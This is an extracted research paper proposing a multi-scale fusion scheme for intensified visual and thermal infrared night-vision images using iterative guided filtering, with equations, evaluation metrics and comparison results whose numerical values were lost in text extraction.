(tomasi & manduchi, ). while the blf is quite effective at smoothing small intensity changes while preserving strong edges and has efficient implementations, it also tends to blur across edges at larger spatial scales, thereby limiting its value for application in multi-scale image decomposition schemes (farbman et al., ). in addition, the blf has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: he, sun & tang, ). in the joint (or cross) bilateral filter (jblf) a second or guidance image serves to steer the edge stopping range filter thus preventing over- or under- blur near edges (petschnigg et al., ). zhang et al. ( ) showed that the application of the jblf in an iterative framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. the recently introduced guided filter (gf: he, sun & tang, ) is a computationally efficient, edge-preserving translation-variant operator based on a local linear model which avoids the drawbacks of bilateral filtering and other previous approaches. when the input image also serves as the guidance image, the gf behaves like the edge preserving blf. hence, the gf can gracefully eliminate small details while recovering larger scale edges when applied in an iterative framework. in this paper we propose a multi-scale image fusion scheme, where iterative guided filtering is used to decompose the input images into approximate and residual layers at successive spatial scales, and guided filtering is used to construct the weight maps used in the recombination process. 
the rest of this paper is organized as follows. ‘edge preserving filtering’ briefly discusses the principles of edge preserving filtering and introduces (iterative) guided filtering. in ‘related work’ we discuss related work. ‘proposed method’ presents the proposed guided fusion based image fusion scheme. ‘methods and material’ presents the imagery and computational methods that were used to assess the performance of the new image fusion scheme. the results of the evaluation study are presented in ‘results.’ finally, in ‘discussion and conclusions’ the results are discussed and some conclusions are presented. edge preserving filtering in this section we briefly introduce the edge preserving bilateral and joint bilateral filters, show how they are related to the guided filter, and how the application of a guided filter in an iterative framework results in size selective filtering of small scale image details combined with the recovery of larger scale edges. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bilateral filter spatial filtering is a common operation in image processing that is typically used to reduce noise or eliminate small spurious details (e.g., texture). in spatial filtering the value of the filtered image at a given location is a function (e.g., a weighted average) of the original pixel values in a small neighborhood of the same location. although low pass filtering or blurring (e.g., averaging with gaussian kernel) can effectively reduce image noise, it also seriously degrades the articulation of (blurs) significant image edges. therefore, edge preserving filters have been developed that reduce small image variations (noise or texture) while preserving large discontinuities (edges). the bilateral filter is a non-linear filter that computes the output at each pixel as a gaussian weighted average of their spatial and spectral distances. it prevents blurring across edges by assigning larger weights to pixels that are spatially close and have similar intensity values (tomasi & manduchi, ). it uses a combination of (typically gaussian) spatial and a range (intensity) filter kernels that perform a blurring in the spatial domain weighted by the local variation in the intensity domain. it combines a classic low-pass filter with an edge-stopping function that attenuates the filter kernel weights at locations where the intensity difference between pixels is large. bilateral filtering was developed as a fast alternative to the computationally expensive technique of anisotropic diffusion, which uses gradients of the filtering images itself to guide a diffusion process, avoiding edge blurring (perona & malik, ). more formally, at a given image location (pixel) i, the filtered output oi is given by: oi= ki ∑ j∈� ij f (‖i−j‖) g(‖ii−ij‖) ( ) where f is the spatial filter kernel (e.g., a gaussian centered at i), g is the range or intensity (edge-stopping) filter kernel (centered at the image value at i), � is the spatial support of the kernel, and ki is a normalizing factor (the sum of the f · g filter weights). intensity edges are preserved since the bilateral filter decreases not only with the spatial distance but also with the intensity distance. 
though the filter is efficient and effectively reduces noise while preserving edges in many situations, it has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: he, sun & tang, ). in the joint (or cross) bilateral filter (jblf) the range filter is applied to a second or guidance image g (petschnigg et al., ): oi= ki ∑ j∈� ij ·f (‖i−j‖)·g(‖gi−gj‖). ( ) the jblf can prevent over- or under- blur near edges by using a related image g to guide the edge stopping behavior of the range filter. that is, the jblf smooths the image i while preserving edges that are also represented in the image g. the jblf is particularly favored when the edges in the image that is to be filtered are unreliable (e.g., due to noise toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. or distortions) and when a companion image with well-defined edges is available (e.g., in the case of flash /no-flash image pairs). thus, in the case of filtering an ii image for which a companion (registered) ir image is available, the guidance image may either be the ii image itself or its ir counterpart. guided filtering a guided image filter (he, sun & tang, ) is a translation-variant filter based on a local linear model. guided image filtering involves an input image i, a guidance image g) and an output image o. the two filtering conditions are (i) that the local filter output is a linear transform of the guidance image g and (ii) as similar as possible to the input image i. the first condition implies that oi=akgi+bk ∀i∈ωk ( ) where ωk is a square window of size ( r+ )×( r+ ). the local linear model ensures that the output image o has an edge only at locations where the guidance image g has one, because ∇o=a∇g. the linear coefficients ak and bk are constant in ωk. they can be estimated by minimizing the squared difference between the output image o and the input image i (the second filtering condition) in the window ωk, i.e., by minimizing the cost function e: e(ak,bk)= ∑ i∈ωk ( (akgi+bk−ii) +εa k ) ( ) where ε is a regularization parameter penalizing large ak. the coefficients ak and bk can directly be solved by linear regression (he, sun & tang, ): ak = |ω| ∑ i∈ωk giii−gkik σ k +ε ( ) bk = ik−akgk ( ) where |ω| is the number of pixels in ωk, ik and gk represent the means of respectively i and g over ωk, and σ k is the variance of i over ωk. since pixel i is contained in several different (overlapping) windows ωk, the value of oi in eq. ( ) depends on the window over which it is calculated. this can be accounted for by averaging over all possible values of oi: oi= |ω| ∑ k|i∈ωk (akgk+bk). ( ) since ∑ k|i∈ωk ak = ∑ k∈ωiak due to the symmetry of the box window eq. ( ) can be written as oi=aigi+bi ( ) where ai = |ω| ∑ k∈ωiak and bi = |ω| ∑ k∈ωibk are the average coefficients of all windows overlapping i. although the linear coefficients (ai,bi) vary spatially, their gradients will be toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. smaller than those of g near strong edges (since they are the output of a mean filter). as a result we have ∇o≈a∇g, meaning that abrupt intensity changes in the guiding image g are still largely preserved in the output image o. equations ( ), ( ) and ( ) define the guided filter. 
when the input image also serves as the guidance image, the guided filter behaves like the edge preserving bilateral filter, with the parameters ε and the window size r having the same effects as respectively the range and the spatial variances of the bilateral filter. equations ( ) can be rewritten as oi= ∑ j wij(g)ij ( ) with the weighting kernel wij depending only on the guidance image g: wij = |ω| ∑ k:(i,j)∈ωk ( + (gi−gk)(gj−gk) σ k +ε ) . ( ) since ∑ jwij(g)= this kernel is already normalized. the guided filter is a computationally efficient, edge-preserving operator which avoids the gradient reversal artefacts of the bilateral filter. the local linear condition formulated by eq. ( ) implies that its output is locally approximately a scaled version of the guidance image plus an offset. this makes it possible to use the guided filter to transfer structure from the guidance image g to the output image o, even in areas where the input image i is smooth (or flat). this structure- transferring filtering is an useful property of the guided filter, and can for instance be applied for feathering/matting and dehazing (he, sun & tang, ). iterative guided filtering zhang et al. ( ) showed that the application of the joint bilateral filter (eq. ( )) in an iterative framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. in this scheme the result gt+ of the tth iteration is obtained from the joint bilateral filtering of the input image i using the result gt of the previous iteration step as the guidance image: gt+ i = ki ∑ j∈� ij ·f (‖i−j‖)·g(‖g t i −g t j‖). ( ) in this scheme, details smaller than the gaussian kernel of the bilateral filter are removed while the edges of the remaining details are iteratively restored. hence, this scheme allows the selective elimination of small scale details while preserving the remaining image structure. note that the initial guidance image g can simply be a constant (e.g., zero) valued image since it updates to the gaussian filtered input image in the first iteration step. here we propose to replace the bilateral filter in this scheme by a guided filter to avoid any gradient reversal artefacts. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. related work as mentioned before, most multi-scale transform-based image fusion methods introduce some artefacts because the spatial consistency is not well-preserved (li, kang & hu, ). this has led to the use of edge preserving filters to decompose source images into approximate and residual layers while preserving the edge information in the fusion process. techniques that have been applied include weighted least squares filter (yong & minghui, ), l fidelity using l gradient (cui et al., ), l gradient minimization (zhao et al., ), cross bilateral filter (kumar, ) and anisotropic diffusion (bavirisetti & dhuli, a). li, kang & hu ( ) proposed to restore spatial consistency by using guided filtering in the weighted recombination stage of the fusion process. in their scheme, the input images are first decomposed into approximate and residual layers using a simple averaging filter. next, each input image is then filtered with a laplacian kernel followed by blurring with a gaussian kernel, and the absolute value of the result is adopted as a saliency map that characterizes the local distinctness of the input image details. 
then, binary weight maps are obtained by comparing the saliency maps of all input images, and assigning a pixel in an individual weight map the value if it is the pixelwise maximum of all saliency maps, and otherwise. the resulting binary weight maps are typically noisy and not aligned with object boundaries and may produce artefacts to the fused image. li, kang & hu ( ) performed guided filtering on each weight map with its corresponding source layer as the guidance image, to reduce noise and to restore spatial consistency. the gf guarantees that pixels with similar intensity values have similar weights and weighting is not performed across edges. typically a large filter size and a large blur degree are used to fuse the approximation layers, while a small filter size and a small blur degree are used to combine the residual layers. finally, the fused image is obtained by weighted recombination of the individual source residual layers. despite the fact that this method is efficient and can achieve state-of-the-art performance in most cases, it does not use edge preserving filtering in the decomposition stage and applies a saliency map that does not relate well to human visual saliency (gan et al., ). in their multi-scale image fusion framework gan et al. ( ) apply edge preserving filtering in the decomposition stage to extract well-defined image details (i.e., to preserve their edges) and use guided filtering in the weighted recombination stage to reduce spatial inconsistencies introduced by the weighting maps used in the reconstruction stage (i.e., to prevent edge artefacts like halos). first, a nonlinear weighted least squares edge-preserving filter (farbman et al., ) is used to decompose the source images into approximate and residual layers. next, phase congruency is used to calculate saliency maps that characterize the local distinctness of the source image details. the rest of their scheme is similar to that of li, kang & hu ( ): binary weight maps are obtained from pixelwise comparison of the saliency maps corresponding to the individual source images; guided filtering is applied to these binary weight maps to recue noise and restore spatial consistency, and the fused image is obtained by weighted recombination of the individual source residual layers. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flow chart of the proposed image fusion scheme. the processing scheme is illustrated for two source images x and y and resolution levels ( – ). x and y are the original input images, while xi and yi represent successively lower resolution versions obtained by iterative guided filtering. ‘saliency’ repre- sents the frequency-tuned saliency transformation, ‘max’ and ‘mean’ respectively denote the pointwise maximum and mean operators, ‘(i)gf’ means (iterative) guided filtering, ‘dx,’ ‘dy ’ and ‘df’ are respec- tively the original and fused detail layers, ‘bw ’ the binary weight maps, and ‘w ’ the smooth weight maps. proposed method a flow chart of the proposed multi-scale decomposition fusion scheme is shown in fig. . the algorithm consists of the following steps: . iterative guided filtering is applied to decompose the source images into approximate layers (representing large scale variations) and residual layers (containing small scale variations). . frequency-tuned filtering (achanta et al., ) is used to generate saliency maps for the source images. toet ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. . binary weighting maps are computed as the pixelwise maximum of the individual source saliency maps. . guided filtering is applied to each binary weighting map with its corresponding source as the guidance image to reduce noise and to restore spatial consistency. . the fused image is computed as a weighted recombination of the individual source residual layers. in a hierarchical framework steps – are performed at multiple spatial scales. in this paper we used a level decomposition obtained by filtering at three different spatial scales (see fig. ). figure shows the intensified visual (ii) and thermal infrared (ir) or near infrared (nir) images together with the results of the proposed image fusion scheme, for the different scenes that were used in the present study. we will now discuss the proposed fusion scheme in more detail. consider two co-registered source images x (x,y) and y (x,y). the proposed scheme then applies iterative guided filtering (igf) to the input images xi and yi to obtain progressively coarser image representations xi+ and yi+ (i> ): igf(xi,ri,εi)=xi+ ; i∈{ , , } ( ) where the parameters εi and ri represent respectively the range and the spatial variances of the guided filter at iteration step i. in this study the number of iteration steps is set to . by letting each finer scale image serve as the approximate layer for the preceding coarser scale image the successive size-selective residual layers dxi are simply obtained by subtraction as follows: dxi=xi−xi+ ; i∈{ , , }. ( ) figure shows the approximate and residual layers that are obtained this way for the tank scene (nr in fig. ). the edge-preserving properties of the iterative guided filter guarantee a graceful decomposition of the source images into details at different spatial scales. the filter size and regularization parameters used in this study are respectively set to ri={ , , } and εi={ . , . , . } for i={ , , }. visual saliency refers to the physical, bottom-up distinctness of image details (fecteau & munoz, ). it is a relative property that depends on the degree to which a detail is visually distinct from its background (wertheim, ). since saliency quantifies the relative visual importance of image details saliency maps are frequently used in the weighted recombination phase of multi-scale image fusion schemes (bavirisetti & dhuli, b; cui et al., ; gan et al., ). frequency tuned filtering computes bottom-up saliency as local multi-scale luminance contrast (achanta et al., ). the saliency map s for an image i is computed as s(x,y)= ∥∥iµ−if (x,y)∥∥ ( ) where iµ is the arithmetic mean image feature vector, if represents a gaussian blurred version of the original image, using a × separable binomial kernel, ‖‖ is the l norm (euclidian distance), and x,y are the pixel coordinates. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure original input and fused images for all scenes. the intensified visual (ii), thermal infrared (ir) or near infrared (nir: scene ) source images together with the result of the proposed fusion scheme (f) for each of the scenes used in this study. a recent and extensive evaluation study comparing state-of-the-art saliency models found that the output of this simple saliency model correlates more strongly with human visual perception than the output produced by any of the other available models (toet, ). toet ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. figure base and detail layers for the tank scene. original intensified visual (a) and thermal infrared (h) images for scene nr. , with their respective base b–d and i–k and detail e–g and l–n layers at suc- cessively lower levels of resolution. in the proposed fusion scheme we first compute saliency maps sxi and syi for the individual source layers xi and yi, i∈{ , , }. binary weight maps bwxi and bwyi are then computed by taking the pixelwise maximum of corresponding saliency maps sxi and syi: bwxi(x,y)= { if sxi(x,y)>syi(x,y) otherwise bwyi(x,y)= { if syi(x,y)>sxi(x,y) otherwise. ( ) the resulting binary weight maps are noisy and typically not well aligned with object boundaries, which may give rise to artefacts in the final fused image. spatial consistency is therefore restored through guided filtering (gf) of these binary weight maps with the corresponding source layers as guidance images: wxi =gf(bwxi,xi) wyi =gf(bwyi,yi). ( ) as noted before guided filtering combines noise reduction with edge preservation, while the output is locally approximately a scaled version of the guidance image. in the present scheme these properties are used to transform the binary weight maps into smooth toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure computing smoothed weight maps by guided filtering of binary weight maps. saliency maps at levels , and for respectively the in- tensified visual (a–c) and thermal infrared (d–f) images from fig. . complementary binary weight maps for both image modalities (g–i and j– l) are obtained with a pointwise maximum operator at corresponding levels. smooth continuous weight maps (m–o and p–r) are produced by guided filtering of the binary weight maps with their corresponding base layers as guidance images. continuous weight maps through guided filtering with the corresponding source images as guidance images. figure illustrates the process of computing smoothed weight maps by guided filtering of the binary weight maps resulting from the pointwise maximum of the corresponding source layer saliency maps for the tank scene. fused residual layers are then computed as the normalized weighted mean of the corresponding source residual layers: dfi= wxi ·dxi+wyi ·dyi wxi+wyi . ( ) the fused image f is finally obtained by adding the fused residual layers to the average value of the coarsest source layers: f = x +y + ∑ i= dfi. ( ) by using guided filtering both in the decomposition stage and in the recombination stage, this proposed fusion scheme optimally benefits from both the multi-scale edge-preserving characteristics (in the iterative framework) and the structure restoring capabilities (through guidance bythe originalsource images) ofthe guided filter. themethod is easyto implement and computationally efficient. methods and material this section presents the test imagery and computational metrics used to assess the performance of the proposed images fusion scheme in comparison to existing multi-scale fusion schemes. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison with existing multiresolution fusion schemes. 
methods and material
this section presents the test imagery and computational metrics used to assess the performance of the proposed image fusion scheme in comparison to existing multi-scale fusion schemes.

figure: comparison with existing multiresolution fusion schemes. original intensified visual (a) and thermal infrared (b) images, and the fused results obtained with respectively a contrast pyramid (c), gradient pyramid (d), laplace pyramid (e), morphological pyramid (f), ratio pyramid (g), dwt (h), sidwt (i), and the proposed method (j). corresponding figures show the same comparison for the other scenes.

test imagery
figure shows the intensified visual (ii), thermal infrared (ir) or near infrared (nir) source images together with the result of the proposed fusion scheme (f) for each of the scenes used in this study. the scenes are part of the tno image fusion dataset (toet) with the following identifiers: airplane_in_trees, barbed_wire_ , jeep, kaptein_ , marne_ , marne_ , marne_ , reek, tank, nato_camp_sequence, soldier_behind_smoke, vlasakkers.

multi-scale fusion schemes used for comparison
in this study we compare the performance of our image fusion scheme with seven other popular image fusion methods based on multi-scale decomposition, including the laplacian pyramid (burt & adelson), the ratio of low-pass pyramid (toet, b), the contrast pyramid (toet, van ruyven & valeton), the filter-subtract-decimate laplacian pyramid (burt; burt & kolczynski), the gradient pyramid (burt; burt & kolczynski), the morphological pyramid (toet, a), the discrete wavelet transform (lemeshewsky; li, manjunath & mitra; li, kwok & wang; scheunders & de backer), and a shift invariant extension of the discrete wavelet transform (lemeshewsky; rockinger; rockinger & fechner). we used rockinger's freely available matlab image fusion toolbox (www.metapix.de/toolbox.htm) to compute these fusion schemes. to allow a straightforward comparison, the same number of scale levels is used in all methods, and simple averaging is used to compute the approximation of the fused image representation at the coarsest spatial scale. the comparison figures show the results of the proposed method together with the results of the other seven fusion schemes for some of the scenes used in this study.
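to make the comparison setup concrete, the following sketch shows a generic laplacian-pyramid fusion baseline with maximum-absolute selection of detail coefficients and simple averaging at the coarsest level. it is a textbook formulation, not rockinger's matlab toolbox, and the number of levels is an assumption.

```python
# generic laplacian-pyramid fusion baseline (illustrative, not the toolbox used in the paper).
import numpy as np
from skimage.transform import resize


def laplacian_pyramid(img, levels=4):
    gauss = [img.astype(float)]
    for _ in range(levels - 1):
        h, w = gauss[-1].shape
        gauss.append(resize(gauss[-1], (h // 2, w // 2), anti_aliasing=True))
    # detail levels are differences between a level and the upsampled next-coarser level
    lap = [gauss[i] - resize(gauss[i + 1], gauss[i].shape) for i in range(levels - 1)]
    return lap, gauss[-1]                 # detail levels + coarsest approximation


def fuse_laplacian(x, y, levels=4):
    lx, cx = laplacian_pyramid(x, levels)
    ly, cy = laplacian_pyramid(y, levels)
    # detail levels: keep the coefficient with the larger absolute value;
    # coarsest level: simple averaging, as in the comparison setup described above
    fused = [np.where(np.abs(a) >= np.abs(b), a, b) for a, b in zip(lx, ly)]
    out = 0.5 * (cx + cy)
    for d in reversed(fused):
        out = resize(out, d.shape) + d    # reconstruct from coarse to fine
    return out
```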
objective evaluation metrics
image fusion results can be evaluated using either subjective or objective measures. subjective methods are based on psycho-visual testing and are typically expensive in terms of time, effort, and equipment required. also, in most cases there is only little difference among fusion results, which makes it difficult to evaluate fusion results subjectively. therefore, many objective evaluation methods have been developed (for an overview see e.g., li, li & gong; liu et al.). however, so far there is no universally accepted metric to objectively evaluate image fusion results. in this paper we use four frequently applied computational metrics to objectively evaluate and compare the performance of different image fusion methods: entropy, the mean structural similarity index (mssim), normalized mutual information (nmi), and normalized feature mutual information (nfmi). these metrics are briefly discussed in the following sections.

entropy
entropy (e) is a measure of the information content of a fused image f. it is defined as

$e_f = -\sum_{i=0}^{l-1} p_f(i)\,\log p_f(i)$

where $p_f(i)$ indicates the probability that a pixel in the fused image f has gray value i, and the gray values range from 0 to l. the larger the entropy is, the more informative the fused image is. a fused image is more informative than either of its source images when its entropy is higher than the entropy of its source images.

mean structural similarity index
the structural similarity (ssim: wang et al.) index is a stabilized version of the universal image quality index (uiq: wang & bovik) which can be used to quantify the structural similarity between a source image a and a fused image f:

$\mathrm{ssim}_{x,y} = \frac{2\mu_x\mu_y + c_1}{\mu_x^2 + \mu_y^2 + c_1}\cdot\frac{2\sigma_x\sigma_y + c_2}{\sigma_x^2 + \sigma_y^2 + c_2}\cdot\frac{\sigma_{xy} + c_3}{\sigma_x\sigma_y + c_3}$

where x and y represent local windows of size m×n in respectively a and f, and

$\mu_x = \frac{1}{m\times n}\sum_{i=1}^{m}\sum_{j=1}^{n} x(i,j),\qquad \mu_y = \frac{1}{m\times n}\sum_{i=1}^{m}\sum_{j=1}^{n} y(i,j),$

$\sigma_x^2 = \frac{1}{m\times n}\sum_{i=1}^{m}\sum_{j=1}^{n}\bigl(x(i,j)-\mu_x\bigr)^2,\qquad \sigma_y^2 = \frac{1}{m\times n}\sum_{i=1}^{m}\sum_{j=1}^{n}\bigl(y(i,j)-\mu_y\bigr)^2,$

$\sigma_{xy} = \frac{1}{m\times n}\sum_{i=1}^{m}\sum_{j=1}^{n}\bigl(x(i,j)-\mu_x\bigr)\bigl(y(i,j)-\mu_y\bigr).$

by default the stabilizing constants are set to $c_1 = (0.01\cdot l)^2$, $c_2 = (0.03\cdot l)^2$ and $c_3 = c_2/2$, where l is the maximal gray value. the value of ssim is bounded and ranges between −1 and 1 (it is 1 only when both images are identical). the ssim is typically computed over a sliding window to compare local patterns of pixel intensities that have been normalized for luminance and contrast. the mean structural similarity (mssim) index quantifies the overall similarity between a source image a and a fused image f:

$\mathrm{mssim}_{a,f} = \frac{1}{n_w}\sum_{i=1}^{n_w}\mathrm{ssim}_{x_i,y_i}$

where $n_w$ represents the number of local windows of the image. an overall image fusion quality index can then be defined as the mean of the mssim values between each of the source images and the fused result:

$\mathrm{mssim}_{ab}^{f} = \frac{\mathrm{mssim}_{a,f} + \mathrm{mssim}_{b,f}}{2}.$

$\mathrm{mssim}_{ab}^{f}$ ranges between −1 and 1 (it is 1 only when both images are identical).

normalized mutual information
mutual information (mi) measures the amount of information that two images have in common. it can be used to quantify the amount of information from a source image that is transferred to a fused image (qu, zhang & yan). the mutual information between a source image a and a fused image f is defined as:

$\mathrm{mi}_{a,f} = \sum_{i,j} p_{a,f}(i,j)\,\log\frac{p_{a,f}(i,j)}{p_a(i)\,p_f(j)}$

where $p_a(i)$ and $p_f(j)$ are the probability density functions of the individual images, and $p_{a,f}(i,j)$ is the joint probability density function. the traditional mutual information metric is unstable and may bias the measure towards the source image with the highest entropy. this problem can be resolved by computing the normalized mutual information (nmi) as follows (hossny, nahavandi & creighton):

$\mathrm{nmi}_{ab}^{f} = \frac{\mathrm{mi}_{a,f}}{h_a + h_f} + \frac{\mathrm{mi}_{b,f}}{h_b + h_f}$

where $h_a$, $h_b$ and $h_f$ are the marginal entropies of a, b and f, and $\mathrm{mi}_{a,f}$ and $\mathrm{mi}_{b,f}$ represent the mutual information between the source image a and the fused image f, and between the source image b and the fused image f, respectively. a higher value of nmi indicates that more information from the source images is transferred to the fused image. the nmi metric is bounded.
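the following sketch computes the entropy, mssim and nmi metrics defined above for 8-bit images. skimage's structural_similarity stands in for the sliding-window mssim computation, and the 256-bin histograms are an assumption about the discretization.

```python
# sketch of the entropy, mssim and nmi fusion metrics; 8-bit gray-value images assumed.
import numpy as np
from skimage.metrics import structural_similarity


def entropy(img, bins=256):
    p, _ = np.histogram(img, bins=bins, range=(0, bins), density=True)
    p = p[p > 0]
    return -np.sum(p * np.log2(p))


def mssim_fusion(a, b, f, l=255):
    # mean ssim between each source and the fused image, then averaged
    return 0.5 * (structural_similarity(a, f, data_range=l)
                  + structural_similarity(b, f, data_range=l))


def mutual_information(a, f, bins=256):
    joint, _, _ = np.histogram2d(a.ravel(), f.ravel(), bins=bins)
    pxy = joint / joint.sum()
    px, py = pxy.sum(axis=1), pxy.sum(axis=0)
    nz = pxy > 0
    return np.sum(pxy[nz] * np.log2(pxy[nz] / (px[:, None] * py[None, :])[nz]))


def nmi_fusion(a, b, f):
    ha, hb, hf = entropy(a), entropy(b), entropy(f)
    return (mutual_information(a, f) / (ha + hf)
            + mutual_information(b, f) / (hb + hf))
```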
normalized feature mutual information
the feature mutual information (fmi) metric calculates the amount of image features that two images have in common (haghighat & razian; haghighat, aghagolzadeh & seyedarabi). this method outperforms other metrics (e.g., e, nmi) in consistency with subjective quality measures. previously proposed mi-based image fusion quality metrics use the image histograms to compute the amount of information a source and fused image have in common (cvejic, canagarajah & bull; qu, zhang & yan). however, image histograms contain no information about local image structure (spatial features or local image quality) and only provide statistical measures of the number of pixels at a specific gray level. since meaningful image information is contained in visual features, image fusion quality measures should quantify the extent to which these visual features are transferred into the fused image from each of the source images. the fmi metric therefore calculates the mutual information between image feature maps (haghighat & razian; haghighat, aghagolzadeh & seyedarabi). a typical image feature map is for instance the gradient map, which contains information about the pixel neighborhoods, edge strength and directions, texture and contrast. given two source images a and b and their fused image f, the fmi metric first extracts feature maps of the source and fused images using a feature extraction method (e.g., gradient). after feature extraction, the feature images a′, b′ and f′ are normalized to create their marginal probability density functions $p_{a'}$, $p_{b'}$ and $p_{f'}$. the joint probability density functions $p_{a',f'}$ and $p_{b',f'}$ are then estimated from the marginal distributions using nelsen's method (nelsen). the algorithm is described in more detail elsewhere (haghighat, aghagolzadeh & seyedarabi). the fmi metric between a source image a and a fused image f is then given by

$\mathrm{fmi}_{a,f} = \mathrm{mi}_{a',f'} = \sum_{i,j} p_{a',f'}(i,j)\,\log\frac{p_{a',f'}(i,j)}{p_{a'}(i)\,p_{f'}(j)}$

and the normalized feature mutual information (nfmi) can be computed as

$\mathrm{fmi}_{ab}^{f} = \frac{\mathrm{mi}_{a',f'}}{h_{a'} + h_{f'}} + \frac{\mathrm{mi}_{b',f'}}{h_{b'} + h_{f'}}.$

in practice the fmi is computed locally over small corresponding windows between the source and the fused images and averaged over all windows covering the image plane (haghighat & razian).

table: entropy values for each of the methods tested and for all scenes. columns: scene nr., contrast, dwt, gradient, laplace, morph, ratio, sidwt, igf.

results
fusion evaluation
here we assess the performance of the proposed image fusion scheme on the intensified visual and thermal infrared images for each of the selected scenes, using entropy, the mean structural similarity index (mssim), normalized mutual information (nmi), and normalized feature mutual information (nfmi) as the objective performance measures. we also compare the results of the proposed method with those of seven other popular multi-scale fusion schemes. the table lists the entropy of the fused result for the proposed method (igf) and all seven multi-scale comparison methods (contrast pyramid, dwt, gradient pyramid, laplace pyramid, morphological pyramid, ratio pyramid, sidwt). it appears that igf produces a fused image with the highest entropy for of the test scenes. note that a larger entropy implies more edge information, but it does not mean that the additional edges are indeed meaningful (they may result from over enhancement or noise).
therefore, we also need to consider structural information metrics. table shows that igf outperforms all other multi-scale methods tested here in terms of mssim. this means that the mean overall structural similarity between both source images the fused image f is largest for the proposed method. table shows that igf also outperforms all other multi-scale methods tested here in terms of nmi. this indicates that the proposed igf fusion scheme transfers more information from the source images to the fused image than any of the other methods. table shows that igf also outperforms of the other multi-scale methods tested here in terms of nfmi. igf is only outperformed by sidwt for scene and by the contrast pyramid for scene . this implies that fused images produced by the proposed igf scheme typically have a larger amount of image features in common with their source images than the results of most other fusion schemes. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mssim values for each of the methods tested and for all scenes. scene nr. contrast dwt gradient laplace morph ratio sidwt igf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . table nmi values for each of the methods tested and for all scenes. scene nr. contrast dwt gradient laplace morph ratio sidwt igf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . summarizing, the proposed igf fusion scheme appears to outperform the other multi-scale fusion methods investigated here in most of the conditions tested. runtime in this study we used a matlab implementation of the gf and igf written by zhang et al. ( ) that is freely available from the authors (at http://www.cs.cuhk.edu.hk/~leojia/ projects/rollguidance). we made no effort to optimize the code of the algorithms. we conducted a runtime test on a dell latitude laptop with an intel i ghz cpu and gb memory. the algorithms were implemented in matlab a. only a single thread was used without involving any simd instructions. for this test we used the set of test images described in ‘test imagery.’ as noted before, the filter size and regularization parameters used in this study are respectively set to ri ={ , , } and εi ={ . , . , . } for toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://dx.doi.org/ . /peerj-cs. table nfmi values for each of the methods tested and for all scenes. scene nr. contrast dwt gradient laplace morph ratio sidwt igf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . spatial scale levels i={ , , }. the mean runtime of the proposed fusion method was . ± . s. discussion and conclusions we propose a multi-scale image fusion scheme based on guided filtering. iterative guided filtering is used to decompose the source images into approximation and residual layers. initial binary weighting maps are computed as the pixelwise maximum of the individual source saliency maps, obtained from frequency tuned filtering. 
spatially consistent and smooth weighting maps are then obtained through guided filtering of the binary weighting maps with their corresponding source layers as guidance images. saliency weighted recombination of the individual source residual layers and the mean of the coarsest scale source layers finally yields the fused image. the proposed multi-scale image fusion scheme achieves spatial consistency by using guided filtering both at the decomposition and at the recombination stage of the multi-scale fusion process. application to multiband visual (intensified) and thermal infrared imagery demonstrates that the proposed method obtains state-of-the-art performance for the fusion of multispectral nightvision images. the method has a simple implementation and is computationally efficient. additional information and declarations funding the effort was sponsored by the air force office of scientific research, air force material command, usaf, under grant number fa - - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the author: air force office of scientific research, air force material command, usaf: fa - - - . competing interests the author declares there are no competing interests. author contributions • alexander toet conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: figshare: tno image fusion dataset http://dx.doi.org/ . /m .figshare. . references achanta r, hemami s, estrada f, süsstrunk s. . frequency-tuned salient region de- tection. in: hemami s, estrada f, susstrunk s, eds. ieee international conference on computer vision and pattern recognition (cvpr ). piscataway: ieee, – . agarwal j, bedi ss. . implementation of hybrid image fusion technique for feature enhancement in medical diagnosis. human-centric computing and information sciences ( ): – doi . /s - - - . bavirisetti dp, dhuli r. a. fusion of infrared and visible sensor images based on anisotropic diffusion and karhunen–loeve transform. ieee sensors journal ( ): – doi . /jsen. . . bavirisetti dp, dhuli r. b. two-scale image fusion of visible and infrared images using saliency detection. infrared physics and technology : – doi . /j.infrared. . . . beyan c, yigit a, temizel a. . fusion of thermal- and visible-band video for 